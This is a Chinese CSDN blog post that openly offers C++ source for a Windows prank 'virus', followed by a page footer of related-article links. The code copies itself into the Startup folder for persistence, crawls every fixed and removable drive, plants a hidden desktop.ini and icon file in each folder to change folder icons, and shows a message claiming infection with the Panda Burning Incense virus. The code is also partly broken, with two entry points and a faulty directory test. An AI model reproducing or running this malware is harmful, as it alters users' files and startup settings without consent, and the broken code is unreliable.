病毒别乱试()

已于 2024-07-15 08:55:21 修改
阅读量67 收藏
点赞数 2
文章标签: c++
于 2024-07-14 17:34:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Lsjessie/article/details/140419798
版权 
#include <tchar.h>
#include <iterator>
#include <list>
using namespace std; 
#include<graphics.h>
IMAGE img;
#include<conio.h>
#include <stdio.h>
#include <Shlobj.h>
#pragma comment(lib, "shell32.lib")
#define RC_BINARYTYPE 256
#define ID_ICO 100
#include <windows.h>
BOOL AutoRun_Startup(char *lpszSrcFilePath, char *lpszDestFileName)
{
    char szStartupPath[MAX_PATH] = { 0 };
    char szDestFilePath[MAX_PATH] = { 0 };
    SHGetSpecialFolderPath(NULL, szStartupPath, CSIDL_STARTUP, TRUE);
    wsprintf(szDestFilePath, "%s\\%s", szStartupPath, lpszDestFileName);
    CopyFile(lpszSrcFilePath, szDestFilePath, FALSE);
    return TRUE;
}
bool EnumDirectory(TCHAR *dirpath,bool isInject);
void inject(char *path);
bool WriteResourceToFile(char const *filename);
void clear(char *path);
bool FileExist(char *filepath);
int set_error()
{
	SetErrorMode(SEM_NOOPENFILEERRORBOX|SEM_NOOPENFILEERRORBOX|SEM_NOGPFAULTERRORBOX|SEM_NOALIGNMENTFAULTEXCEPT|SEM_FAILCRITICALERRORS);
	return 1;
}
int APIENTRY WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd )
{ 
	set_error();
	for (char i='A';i<='Z';i++)
	{
		char x[20]={i,':'};
		UINT type=GetDriveType(x);
		if(type==DRIVE_FIXED||type==DRIVE_REMOVABLE)
		{
				
			    EnumDirectory(x,true);				
		}
	}
	MessageBox(NULL,"恭喜你,中了熊猫烧香病毒!","哈哈",MB_OK);
	return 0;
}
bool EnumDirectory(TCHAR *dirpath,bool isInject)
{
 
	WIN32_FIND_DATA fd;
	TCHAR szTempFileFind[MAX_PATH]={0};
	bool bIsFinish=false;
	ZeroMemory(&fd,sizeof(WIN32_FIND_DATA));
	wsprintf(szTempFileFind,"%s\\*.*",dirpath);
	HANDLE hFind=FindFirstFile(szTempFileFind,&fd);
	if(hFind==INVALID_HANDLE_VALUE)
	{
 
		return false;
	}
	while(!bIsFinish)
	{
 
		bIsFinish=(FindNextFile(hFind,&fd))?false:true;
		if((strcmp(fd.cFileName,".")!=0)&&(strcmp(fd.cFileName,"..")!=0))
		{
 
			TCHAR szFoundFileName[MAX_PATH]={0};
			strcpy(szFoundFileName,fd.cFileName);
			if(fd.dwFileAttributes*FILE_ATTRIBUTE_DIRECTORY)
			{
				TCHAR szTempDir[MAX_PATH]={0};
				wsprintf(szTempDir,"%s\\%s",dirpath,szFoundFileName);
				Sleep(10);
				if(isInject)
				{
					inject(szTempDir);
					EnumDirectory(szTempDir,isInject);
				}else{
					clear(szTempDir);
					EnumDirectory(szTempDir,isInject);
				}
			
 
			}
		}
	}
	FindClose(hFind);
	return true;
}
void inject(char *path)
{
 
	char inifilepath[256];
	char icofilepath[256];
	strcpy(inifilepath,path);
	strcpy(icofilepath,path);
	strcat(inifilepath,"\\desktop.ini");
	strcat(icofilepath,"\\yunshouhu.ico");
	WriteResourceToFile(icofilepath);
	SetFileAttributes(path,FILE_ATTRIBUTE_READONLY);
	SetFileAttributes(inifilepath,FILE_ATTRIBUTE_READONLY|FILE_ATTRIBUTE_HIDDEN);
	WritePrivateProfileString(".ShellClassInfo","IconFile","yunshouhu.ico",inifilepath);
	WritePrivateProfileString(".ShellClassInfo","IconIndex","0",inifilepath);
	
}
void clear(char *path)
{
	char inifilepath[256];
	char icofilepath[256];
	strcpy(inifilepath,path);
	strcpy(icofilepath,path);
	strcat(inifilepath,"\\desktop.ini");
	strcat(icofilepath,"\\yunshouhu.ico");
	char cmd[300]="del ";
 
	if(FileExist(icofilepath))
	{
		DeleteFile(icofilepath);
	
		strcat(cmd,icofilepath);
		system(cmd);
	}
	if(FileExist(inifilepath))
	{
		
		DeleteFile(inifilepath);
 
		strcat(cmd,inifilepath);
		system(cmd);
	}
	
 
 
}
bool FileExist(char *filepath)
{
	WIN32_FIND_DATA FindFileData;
	HANDLE hFind;
	
	hFind = FindFirstFile(filepath, &FindFileData);
	
	if (hFind == INVALID_HANDLE_VALUE) {
 
		return false;
	} else {
		FindClose(hFind);
		return true;
		
  }
 
 
}
bool WriteResourceToFile(char const *filename)
{
 
	HINSTANCE hInstance=GetModuleHandle(NULL);
	HRSRC hResInfo=FindResource(hInstance,MAKEINTRESOURCE(ID_ICO),MAKEINTRESOURCE(RC_BINARYTYPE));
	HGLOBAL hgRes=LoadResource(hInstance,hResInfo);
	void *pvRes=LockResource(hgRes);
	DWORD cbRes=SizeofResource(hInstance,hResInfo);
	HANDLE hFile=CreateFile(filename,GENERIC_WRITE,0,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
	DWORD cbWritten;
	WriteFile(hFile,pvRes,cbRes,&cbWritten,0);
	CloseHandle(hFile);
 
	return false;
} 

int main(int argc, char * argv[])
{
    AutoRun_Startup("c://main.exe", "main.exe");    
	initgraph(640,480);
    while(1)
    {

	    loadimage(&img,L"Genshin.jpg",100,100);
	    loadimage(&img,"Genshin.jpg",100,100);
	    putimage(100,100,&img);
	    getch();
	    closegraph();
    }
    return 0;
}

Lsjessie
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
C++病毒教程&代码
快乐星空Maker的博客
10-14 190
今天我们来做一个小病毒。可以去找你的好朋友去整了!
MEMZ病毒详细分析
Test网络安全
09-08 5853
病毒分析的准备工作 环境:我采用的是吾爱破解的xp系统,里面有很多现成的工具,ida,xdbg都有,只不过ida版本有点低,但是对于本病毒的分析也没太大影响,百度网盘链接:https://pan.baidu.com/s/1YvO264J-atvRUZew8AlS9g 提取码:abcd。(如果有大佬知道怎么在xp系统中使用更高版本的ida,或者有更好的分析病毒的虚拟机,可以在评论区给点资源,谢谢啦) 分析步骤,一般的病毒分析步骤,如下 查壳,常见的有upx,ASpack,等等,可以用来实现简单免杀。
病毒(误乱试
2401_84532311的博客
07-15 380
首先你需要一个dev-c++,实测可用(c++病毒
软件测试(测试用例详解)(三)
qq_45559559的博客
04-01 1315
测试用例(Test Case)是为了实施测试而向被测试的系统提供的一组集合。
蠕虫病毒与一般计算机病毒的区别,蠕虫和病毒的区别是什么啊!
weixin_39942995的博客
07-13 2461
jhello05-26 08:07等级3楼顶ls感染Nimda蠕虫病毒cxhioulover05-26 09:54等级4楼蠕虫,也是病毒的一种吧,大家习惯性的把具有破坏性的程序统称为病毒,就干脆这样叫了。蠕虫最初是有莫里斯做出来的,他的想法是利用一个程序,探查一下,联网的计算机到底有多少,结果事与愿违,导致了网络瘫痪。可以说,蠕虫就是带有感染性,能主动传播的特点。很多流行病毒(如:机器狗、磁碟机、...
计算机桌面软件乱跳怎么办,电脑桌面乱跳怎么办
weixin_31091067的博客
06-22 8608
1. 电脑屏幕跳动是因为什么显示器抖动的原因显示器刷新频率设置得太低当显示器的刷新频率设置低于75Hz时,屏幕常会出现抖动、闪烁的现象,把刷新率适当调高,比如设置成高于85Hz,屏幕抖动的现象一般不会再出现。电源变压器离显示器和机箱太近电源变压器工作时会造成较大的电磁干扰,从而造成屏幕抖动。把电源变压器放在远离机箱和显示器的地方,可以让问题迎刃而解。劣质电源或电源设备已经老化许多杂牌电脑电源...
android parkour 病毒,地铁跑酷ios版本
weixin_42515136的博客
05-26 639
“地铁跑酷”是一款益智和休闲的移动游戏,具有精美精美的图形,非常流畅的操作和令人兴奋的游戏玩法. 这是每个人都可以玩的游戏地铁跑酷ios,可以一直运行,避免追捕警察,避免迎面而来火车来了!快来下载游戏,环游世界,等你!推荐主题: 地铁跑酷Metro Parkour是一款街头风格的休闲益智游戏,具有流畅的操作,令人兴奋的游戏玩法,酷炫的滑板运动,丰富的角色和华丽的特效,为您带来美妙而有趣的游戏体验....
音频交流项目测试(测试用例与总结)
lxyzzzzzz0的博客
08-25 2681
对音频交流项目编写的测试用例以及测试总结报告
病毒技术
weixin_30448603的博客
08-07 1522
病毒技术 反计算机病毒做为计算机安全问题的一个重要组成部分已日益受到人们的重视。本文将对当今先进的病毒/反病毒技术做全面而细致的介绍,重点当然放在了反病毒上,特别是虚拟机和实时监控技术。 在论文中我将首先介绍几种当今较为流行的病毒技术,包括获取系统核心态特权级,驻留,截获系统操作,变形和加密等。然后我将分五节详细讨论虚拟机技术:第一节简单介绍一下虚拟机的概论;第二节介绍加密变形病毒,我会分析...
WEB测试 兼容性 资料搜集
04-08
4. **屏幕分辨率**:不同的显示器有不同的分辨率,测试应确保在不同分辨率下,页面布局不乱,内容可读,功能可用。 5. **JavaScript和CSS兼容性**:JavaScript库和CSS框架可能在某些环境不完全支持,测试应验证这些...
乱刀-CAD去教育版戳(适合2004~2014,非常好用)
12-08
3. **安全风险**:第三方修改工具可能存在安全隐患,如病毒、恶意软件等,使用时需谨慎,以免损害计算机系统或泄露个人信息。 4. **正版软件的优势**:虽然非正规途径可能看似省钱,但正版软件能享受官方的更新、...
数据中心运行与管理规范.doc
07-10
5. 严禁私拉乱接电源,以防止火灾等安全隐患。 6. 关键设备如路由器、交换机、防火墙和服务器等需妥善安置,不得随意配置或挪用。 二、运行及操作管理 1. 所有操作应遵循预定流程,确保系统的安全和效率。 2. 工作...
软件产品检测报告.pdf
09-26
检测结果显示,该软件产品的安装与卸载功能正常,功能模块全部挂接通过,安全稳定性达到要求,用户界面无乱字符,产品包装和说明使用简体中文,支持中文输入和输出,版本号正确,且未发现病毒。 报告结论:该软件...
校园网优化改造建议
08-05
当前校园局域网存在的主要问题有学校宽带接入路由器包转发能力不足、IP 地址分配、冲突问题、维护管理不便、ARP 病毒攻击、BT 下载、QQlive 等带宽占用问题、病毒泛滥问题、病毒、乱安装软件导致系统运行缓慢、崩溃...
c++ primer plus 第16章string 类和标准模板库,string 类输入
zhyjhacker的博客
07-14 1099
c++ primer plus 第16章string 类和标准模板库,string 类输入。
c++ 生成随机字符串
m0_56306892的博客
07-15 217
以下是一个示例代码,它使用std::random_device和std::mt19937生成随机字符,并将结果存储在一个字符串中。std::uniform_int_distribution<> distribution(0, max_index - 1) 创建一个均匀分布,以确保生成的随机数在字符集的索引范围内。输出随机字符串: 在主函数中调用generateRandomString生成一个长度为1024的随机字符串,并输出结果。std::random_device rd 用于生成一个随机种子。
C语言 2个日期相关的函数
waterHBO的博客
07-15 153
读代码的过程中,遇到2个日期相关的工具函数, 记录一下。比较日期,计算日期间隔(天数)
C++ std::thread 管理线程生命周期:join 和 detach
最新发布
m0_59680769的博客
07-16 977
方法用于同步主线程和子线程。也就是说,当主线程调用子线程的join方法时,主线程会被阻塞,直到子线程完成其执行。这意味着join方法确保主线程等待子线程结束,然后继续执行后续代码。t.join()方法则是让子线程在后台独立运行,与主线程分离。分离后的线程(也称为“游离线程”)不能再被join,它的资源会在该线程完成后自动释放。主线程会继续执行而不会等待该子线程。如果把std::this_thread::sleep_for(std::chrono::seconds(3));
计算机病毒防治知识解析
文件提到了不同年份的重要病毒事件,如Brian病毒、‘米开朗基罗’病毒、DIR2病毒、宏病毒、CIH病毒以及通过电子邮件传播的‘美丽杀手’(Melissa)病毒。此外,还强调了识别病毒活动的迹象,如程序文件大小的改变、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值